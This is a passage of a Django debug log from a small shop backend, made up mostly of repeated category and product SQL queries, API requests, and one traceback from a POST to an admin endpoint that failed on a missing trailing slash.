"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) [19/Dec/2019 14:05:46] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 14:05:46,614 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:05:46,618 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:05:46,623 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:05:46,626 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:05:46,629 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:05:46,633 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:05:46,636 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:05:46,641 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:05:46,644 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:05:46,647 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:05:46,650 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:05:46,653 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:05:46,656 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:05:46,659 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:05:46,662 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:05:46,665 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:05:46,667 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:05:46,669 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:05:46,674 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:05:46,677 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:05:46,680 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:05:46,683 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:05:46,686 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:05:46,691 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:05:46,693 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:05:46,696 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:05:46,700 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:05:46,702 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:05:46,705 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:05:46,709 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:05:46,712 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:05:46,715 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:05:46,719 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:05:46,722 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:05:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [19/Dec/2019 14:06:01] "POST /editBlackAndWhiteList HTTP/1.0" 500 63896 DEBUG 2019-12-19 14:06:22,859 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-19 14:06:22,864 utils 4252 140031747061504 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [19/Dec/2019 14:06:22] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-19 14:06:54,019 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-19 14:06:54,024 utils 4252 140031747061504 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [19/Dec/2019 14:06:54] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-19 14:07:10,344 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-19 14:07:10,351 utils 4252 140031747061504 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [19/Dec/2019 14:07:10] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-19 14:07:23,290 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:07:23,301 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:07:23,307 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:07:23,311 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:07:23,317 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:07:23,321 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:07:23,326 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:07:23,331 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:07:23,335 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:07:23,341 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:07:23,345 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:07:23,349 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:07:23,353 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:07:23,357 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:07:23,360 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:07:23,363 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:07:23,365 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:07:23,367 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:07:23,370 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:07:23,373 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:07:23,376 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:07:23,378 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:07:23,380 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:07:23,383 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 